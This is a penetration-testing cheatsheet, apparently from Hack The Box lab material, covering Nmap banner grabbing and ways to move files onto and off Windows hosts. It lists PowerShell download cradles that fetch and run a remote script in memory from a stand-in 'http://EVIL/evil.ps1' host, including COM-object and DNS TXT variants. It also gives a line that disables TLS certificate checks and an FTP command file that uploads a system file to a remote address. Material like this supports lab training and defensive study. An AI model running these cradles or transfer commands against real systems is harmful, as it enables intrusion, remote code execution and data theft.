# Cheatsheet

## Nmap

### Running an Nmap Script

```bash
nmap --script <SCRIPT_NAME> -p<PORT> <DOMAIN/IPADDRESS>
```

## Banner Grabbing

```bash
nmap -sV --script=banner <DOMAIN/IPADDRESS>
```

```bash
netcat <IP_ADDRESS> <PORT>
```

```bash
nc -nv <IP_ADDRESS> <PORT>
```

```bash
curl -IL <DOMAIN>
```

## Windows File Transfer Methods (Download Operations)

### PowerShell Base64 Encode & Decode&#x20;

> Downloading from Linux machine to Windows machine using Base64

On Linux Machine

```bash
cat <FILE> | base64 -w 0;echo
```

On Windows Machine

```powershell
[IO.File]::WriteAllBytes("C:\<LOCATION>\<FILENAME>", [Convert]::FromBase64String("<BASE64>"))
```

### PowerShell Web Downloads

#### PowerShell DownloadFile Method

```powershell
(New-Object Net.WebClient).DownloadFile('<URL>','C:\<LOCATION>\<FILENAME>')
```

```powershell
(New-Object Net.WebClient).DownloadFileAsync('<URL>','C:\<LOCATION>\<FILENAME>')
```

#### PowerShell DownloadString - Fileless Method

> Executes directly to the memory

```powershell
IEX (New-Object Net.WebClient).DownloadString('<URL>')
```

```powershell
(New-Object Net.WebClient).DownloadString('<URL>') | IEX
```

#### PowerShell Invoke-WebRequest

Alternative (Fast)

```powershell
iwr
curl
wget
```

```powershell
Invoke-WebRequest <URL> -OutFile <FILENAME>`
```

#### PowerShell Cradles

> From HarmJ0y, <https://gist.github.com/HarmJ0y/bb48307ffa663256e239>

```powershell
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
#   code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
```

#### UseBasicParsing Error

```powershell
Invoke-WebRequest <URL> -UseBasicParsing | IEX
```

#### Could not establish relationship (SSL/TLS Certificate is not trusted)

```ps
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

### SMB Downloads

#### No Authentication

On Linux, create SMB Server

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

On Windows, copy the file from SMB Server

```powershell
copy \\<IPADRESS>\share\<FILENAME>
```

#### With Authentication

On Linux, create SMB Server with username and password

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

On Windows, mount SMB Server with username and password

```powershell
net use n: \\<IPADRESS>\share /user:<USERNAME> <PASSWORD>
```

```powershell
copy n:\<FILENAME>
```

### FTP Downloads

#### Using pyftpdlib

On Linux, set up FTP Server

```bash
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21
```

On Windows, transfer files from FTP Server using PowerShell

```powershell
(New-Object Net.WebClient).DownloadFile('ftp://<IPADDRESS>/<FILENAME>', 'C:\<LOCATION>\<FILENAME>')
```

#### Create a Command File for the FTP Client and Download the Target File

```
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
```

## Windows File Transfer Methods (Upload Operations)